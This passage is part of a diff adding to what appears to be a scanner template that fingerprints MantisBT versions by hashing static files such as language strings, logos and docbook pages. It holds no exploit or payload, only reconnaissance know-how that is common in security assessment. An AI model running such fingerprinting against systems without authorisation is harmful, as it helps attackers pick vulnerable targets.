"(\"d70c548dc2ccd26ca526154b5cf87aef\" == md5(body))" + - type: dsl + name: 2.19.0 - 2.19.1 + dsl: + - "(\"02665c1324884758d3d7b9547472bf7c\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.21.3 + dsl: + - "(\"fe7be15900bde9018f9babe431494b59\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"6bba849c342edab27a6d421c83662574\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"9b22fe86e58dcab5264d418fce84f629\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_russian.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.16.1 + dsl: + - "(\"3c74e20f97be25b1f0a5000cba936aa9\" == md5(body))" + - type: dsl + name: 2.3.0 - 2.5.2 + dsl: + - "(\"842ba587b6082f631805a25dcbae931f\" == md5(body))" + - type: dsl + 
name: 2.1.0 - 2.2.4 + dsl: + - "(\"fb726314bfc300b6736f0b4cec162d55\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"39745f8fa2d63b7e9def19e328e1bf1b\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"f02a5be18dc4756b7cf6fdf5a344dd52\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"66c5be5ecc019e5faa2528e0d9b33f2a\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"e953cdbaf82d6d47274bcbbadf632397\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"00e8c4e5709edf7cc5a915fc377be9fa\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"d278e0302cc7ca145182d7464a50328c\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"6ffaea95e8367b4f476842723fc93ac8\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"bb490d4fcca19c140d719c1f9fcec2f9\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"939f3c4bae864185e77ab759b68fe4dd\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.21.3 + dsl: + - "(\"67d295a01d61e3b607b61caacba7d64a\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"8398e1f69fcf05465ae2be9e8e9939c8\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"8fb6408c1eeef46c8a3efad7e02e8cb3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Developers_Guide/en-US/Events_Reference_Bug.xml" + + matchers: + - type: dsl + name: 1.3.4 - 2.7.1 + dsl: + - "(\"2f0cd4bf1f465e06e9221b59d29fcbc3\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"6873b971a54ace1eed1452b420c2dd13\" == md5(body))" + - type: dsl + name: 2.8.0 - 2.20.1 + dsl: + - "(\"80e031b8398a35304524aa8786205bd9\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.21.3 + dsl: + - "(\"6774d2db3ec04cd9b95b0d153673eb6e\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"205c2baebd8a763ce674c09e798eaaf7\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - 
"(\"31c2a044b7c630abee6cc3ecb2425369\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_zazaki.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.19.1 + dsl: + - "(\"40099f192db7e6d7639e4aaeac2b7073\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.22.2 + dsl: + - "(\"e8be458a3439471c8b769da221b0e6f7\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"a02d326ef9769fc0b30f2b96f710bacf\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_zazaki.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.19.1 + dsl: + - "(\"105ac32dcf6af2067036ad35a608c7a7\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.22.2 + dsl: + - "(\"771f6563b0dbd96c4fe3ab72f1b8eca3\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"4c5643c5f0b7e8fece689d7932f1a758\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_italian.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.19.1 + dsl: + - "(\"480a11c1706f2a5e54e87cea98a4a5c8\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.5.2 + dsl: + - "(\"b7b5b983331d342820286e4318724a30\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"aedaba6acd6b98fc4c18af9ccd061a31\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"697d0cffda98c4cc19b359c773366613\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"e54eced373cd8faa24fb1b44591cc340\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"f0af93d3cfaae95cacb44a7568b689e9\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"9803000f0d2c4bfb5b5ca3dd9bf6f9c3\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"19c30c56335660e0fd94c8957154b124\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"bba5577f02997314cd6af6bfc12a54ae\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"c193ecca954fa9ba49e4308ce578dc8e\" == 
md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"5b46ca79c400e40ef8c4fa29f5477fd1\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"340ea844c9d132d10cce1b5ab410ab27\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.22.2 + dsl: + - "(\"70b5ee9868d4e625525a5cee4e4faaa4\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"67a97118b49d2718ca4ae1fed6fd86eb\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_english.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.19.1 + dsl: + - "(\"f39c2f6ddd0d50366c52884e25114c17\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.5.2 + dsl: + - "(\"650f3d6449b61fd63a72130bc566db6d\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"7f0903158e6fc53a22050d09739b1540\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"900fc9322d34e1174c53dc8039ab59a1\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"b09643ae4e40609533ef5cf2cd15bb1d\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.4 + dsl: + - "(\"f608986a12072c8c95f963ce694a5475\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"e6bc42f10cb381da20dd25283da0f55b\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"a48a7e0d0c93ebe3a4db48824f24664d\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.22.2 + dsl: + - "(\"bce1c503f9ac61f0a716bf1189f665ff\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"78f48f3b5f06eae5ec6b016116265c63\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_arabic.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.16.1 + dsl: + - "(\"cf50485ffd25ab508909ce1e770fdd15\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"785947960ff3b15ff62238fb47ac2bb8\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"fd4a3b05932bbbeb71d8ab13c5faea6f\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - 
"(\"15c7939de81c2a9881d2f81382e68bd9\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"a553efa15d9ba6204e4234e7c93f0b2d\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"1d2e0617458015e259757483c538c9bf\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"471831757cfe1bd05c4a43198d5e4ec6\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"725639306e6fd530bc0ab37932f86787\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"fa68f188cd40be6c21f54fcc6b8882aa\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"ff6e622ac3612be2db50f457ac33eda1\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.19.1 + dsl: + - "(\"8fa85145910e2fa30442208e78f31868\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.22.2 + dsl: + - "(\"5cdbad61803664b6cd4ea53265299321\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"ea62187dad047859f7154086385496a9\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_danish.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.6.0 + dsl: + - "(\"ab61e7c25d370282d7173caca16afa68\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"7f79f21df30693c017ae06d311836f0c\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"af52b57dd8376e3e0bd7084884d0819f\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"8d59a1d3b3acf4e085d3042ca0127c04\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"5e579d02ef292661eed116ab8fe34da5\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"be2b68181517dc784e0e6c5c9ef47649\" == md5(body))" + - type: dsl + name: 2.7.0 - 2.19.1 + dsl: + - "(\"3e31785b3364b9427a2f687847a0ecf9\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.22.2 + dsl: + - "(\"7b34295a84a685dedd29b8b1796177f9\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"bab7da020c2bd472ced01366c5c00764\" == md5(body))" + 
+ - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_macedonian.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.14.0 + dsl: + - "(\"43209f47d5e6aa2cb459213e5b5591f8\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.5.2 + dsl: + - "(\"86f13b0cbfca22d7765a054352662521\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"c82d3345eb44bf7dce45fb7312460417\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"b9916dac402fb91887c611caae5d2873\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"7cc33c41a013f12eb19bac13717bd78e\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"e72665b0607bf24d6fe892efa61b22d0\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"90c8bfc44417b5f0f0adc6d969c373fc\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"c72944076d40cd1792bf61e9b12dbd6d\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"8fbe3907290c6f0b988c6cddf2cd2a36\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"b8811c4f9dcdf8d85078b2014da73370\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"878a0277e1a094e1e60ef709faee9133\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"d1e135ee940765ddba0566e16b0e77e9\" == md5(body))" + - type: dsl + name: 2.15.0 - 2.19.1 + dsl: + - "(\"d173b1f6e6179899ebe14110eb4e893a\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.22.2 + dsl: + - "(\"e49b701869e180f9bc6522c3ce7e1290\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"e27544ab27d4ccc69dff57030a1dd734\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_arabicegyptianspoken.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.17.2 + dsl: + - "(\"b53e40613b361825f18d3f3da332c1d4\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"4ccf8e640b424e812370c12655aedb8e\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - 
"(\"fc315ea878435d64d4b4a58ed7f9062f\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"fa0fea088d31e12dbaf1c58225bb752e\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"d173faebad2f8842df83aca6950358bb\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"d325cb7411f5e6bb647ff85f2d3be6be\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"cff87956b3c51854f99df67a2f0688c2\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"d5ce7db854403c7b6aaef5d9f0560da0\" == md5(body))" + - type: dsl + name: 2.18.0 - 2.22.2 + dsl: + - "(\"ca2ff5e4ec8e123a83d51feb6f5f210d\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"23bbc91e28fbdf2b360c8c651ca80e84\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_piedmontese.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.22.2 + dsl: + - "(\"96cb5bd0e47bd93bd8084957a61fa38d\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"8227858d7450d6b437acc2cfdd6e5305\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_luxembourgish.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.22.2 + dsl: + - "(\"f93dec68c192060839049290bc9e26e9\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"82835f042b5f11b8d411e41782ba4f46\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_bulgarian.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.22.2 + dsl: + - "(\"779fea8cbb0db3b33b77d53aa300f355\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"0acb3cec05a73ac8a6d1eaf13438c548\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_tagalog.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.22.2 + dsl: + - "(\"ee7e9d8f9018eb3e42fa325a3e4c077d\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"47a0a77ce4a88a2e6c3795c30545e1cd\" == 
md5(body))" + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"15b72919e39f86c63dfa5dcb14145aef\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"8cc68b85bc8a646ac3cb2cc175947ad4\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"5262c77447d3d68536f32f6fc4c48234\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"cc3d017293a5d1cf0f2552a146c8141d\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"53dcf39e318e1921161644f0303c1eee\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"0a01d74418afbb3dde4da0f7ddf41b24\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"7e1c71b9a12d5d78c5ea9fa627240e34\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_vietnamese.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.22.2 + dsl: + - "(\"18aeb53b5c4acd602b3fb1d6478409a9\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.5.2 + dsl: + - "(\"1657c98d5278c26599f3bda5904f7acc\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"abe0a10439fe0fcb3424396dce6061f0\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"9beca9ddaa7ba03b48a4f09507b4445d\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"a10fc5bbf47c8650c0fbf0bdab435f0c\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"fa3c6a64f8281c9a585b04dcf97a1fdf\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"b980ddce5e9591906dd480f523a204df\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"02ac072c9ce81d138f1fc851963a347a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_asturian.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.22.2 + dsl: + - "(\"83f0c11b7fa595b485c30baf37b2d951\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.5.2 + dsl: + - "(\"8822346e8377963c20224b892922ab38\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + 
- "(\"94f67e8251519b060698f5ef7fcbd0bf\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"cec9dd24e83507787bb954e5a7673889\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"1f0a8e6c09448030ff42661ecf6baba1\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"1a54874beb8a584797934b69cba2db76\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_swissgerman.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.22.2 + dsl: + - "(\"a45a7df554afb24cbf098b56bcf02bf9\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"164737ccfb92d5f0354701a13cbe0e80\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"ccf7aa8a150b947a99c1b479f6be60f8\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"52125cfe5861026a8bb06ead58dce8a0\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"df92cbd57e6c70476006d8bb74438581\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"9b379075e631904411e5a0554bab54a4\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"27649c3072afb13196d185672ed6b9d2\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"587fb4c976dcc5c476142fff7cae0577\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"00edc90441f43d26d2944a6300ca204c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_zh-cn.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.22.2 + dsl: + - "(\"051f7457b556a365a761ce556c5cb71b\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"14c2d4681ae6ba43d893d98c56acf2e8\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"785b3be3365b72ea363ece4a79d08f3d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_romanian.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.22.2 + dsl: + - "(\"13951a5e7e23daf4ec386bdbbfd3978a\" == md5(body))" + 
- type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"7134d1658a57a530286e992991544836\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"fc949cdc46fd58686d07be3df6668032\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"e05e17dc531b0486a6f5bdc3b1c8bdb8\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"4dfe86861f0a45ebd203e1a4fe2e5c4e\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"a812d5adf92bf8dad1e3eb18217f333b\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"5966fd8dce2bd75e78e1e6c1a31e86f6\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_breton.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.22.2 + dsl: + - "(\"d26829dd1a5c80d611050b2d3b5c6e53\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.5.2 + dsl: + - "(\"0d2890951b018ae6fab522d27bec354c\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"99a622a390f4af90c69da0c8f4c72336\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"7c0a46ff02c75bd65fd8919245b42765\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"8a3f7fd7dc78f895404282769b42d276\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"c5e66f9d2baed731232a8d698fa789e8\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"6a74c7654f12f04a5895f4f4ca4afcab\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"0912590d89eae333e9df410520f7a6ea\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"147dabae378131749ee8a234700cdaa8\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"eb7cd29a95e6c1d8aaeb0f85d1a3e808\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"6b8e956ccd94efde891156a014644588\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"3d283662a6e836ad2f8ec695b63b980f\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - 
"(\"b9c727db6cd6f0e322a952fa5bc9796a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_occitan.txt" + + matchers: + - type: dsl + name: 2.2.0 - 2.22.2 + dsl: + - "(\"e435a4d72dd24dc5c85b2878c32c70af\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"627811f64c9b2511e14ed826b5c913a1\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"9fe3dff48ce145aee19cae9a58b19d59\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"b980317e4d6cdf62ef6d59101fad1886\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"205eeb7660666cfe5b8d51391e86fc88\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"b91ec746eb5c71a8bd4acb9b6386e6ba\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"5159efa0d97ac9b022602b07be79d50c\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"ebb2bb785a49d3e95b291c979b5943d3\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"d98db8e6d5cff035ef9f6d3c23de3961\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"92cbafd26a9f96098632cfea8781488f\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"dd2a3e5f9509eb59b72da7a3b27ffd93\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"9dff6c607b93f88220d922ae04616354\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"edcca82a65f0bb22950c6df501355ffe\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/mantis_logo.png" + + matchers: + - type: dsl + name: 2.0.0 - 2.22.2 + dsl: + - "(\"6f6f731ce54f063ef1020ad6cf8596d3\" == md5(body))" + - type: dsl + name: 1.2.10 - 1.3.20 + dsl: + - "(\"ba46364c699a330ee0aad0013db3054b\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"9ae11327423fda16d18ed021fe5c20f1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/mantis_logo.gif" + + matchers: + - type: dsl + name: 1.2.10 - 2.22.2 + dsl: + - 
"(\"62c52c31a69302501cf33c7e90e6ffc0\" == md5(body))" + - type: dsl + name: 1.0.7 - 1.2.8 + dsl: + - "(\"4222aae730fece529b6014b991127ae7\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.6 + dsl: + - "(\"b86ada7031cf46532f1490b9857e0e4e\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"1b2b92ab89363d9110a6968e407efc85\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/mantis_logo_notext.png" + + matchers: + - type: dsl + name: 2.0.0 - 2.22.2 + dsl: + - "(\"660dad7e454149d5999662b4373157c7\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"aa73acc7eca548d34aadd51554663e88\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"a00d92e145f7c65f846ae095d2bb24eb\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/doc/modern_my_view.png" + + matchers: + - type: dsl + name: 2.0.0 - 2.22.2 + dsl: + - "(\"412ddece068b347490a78be5f6af1864\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"ad59a62de9e23e595c9d1f03c4a0d71e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/doc/modern_view_issue.png" + + matchers: + - type: dsl + name: 2.0.0 - 2.22.2 + dsl: + - "(\"f6e082cd5ef135f32b06c6f2f3174950\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"2d0f3f8ec166eea9e55a7aaf4ce03491\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/doc/modern_view_issues.png" + + matchers: + - type: dsl + name: 2.0.0 - 2.22.2 + dsl: + - "(\"48a65843581cbd03ec6187eacd426832\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"d2a882327af6100a0e266b16d56ce386\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/images/mantis_logo.png" + + matchers: + - type: dsl + name: 2.0.0 - 2.22.2 + dsl: + - "(\"6f6f731ce54f063ef1020ad6cf8596d3\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"ba46364c699a330ee0aad0013db3054b\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - 
"(\"9ae11327423fda16d18ed021fe5c20f1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/relationship.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.22.2 + dsl: + - "(\"f67dca4f493c78c3bd99c25457452079\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"c9cbb42d2daa915c0079d41d5df12f6e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/uploads.xml" + + matchers: + - type: dsl + name: 2.0.0 - 2.22.2 + dsl: + - "(\"3b4079c8bf31929931e2df242913801d\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"42872c7bd7f239d381739ba716838678\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"b7e2a4311da0502ce97f655d7a9e5787\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/erd/README.md" + + matchers: + - type: dsl + name: 1.3.0 - 2.22.2 + dsl: + - "(\"623223a0d50d08c79bdfc3cdf47e6fa7\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"e9b3d8670835cc199f06363c6435e9ba\" == md5(body))" + 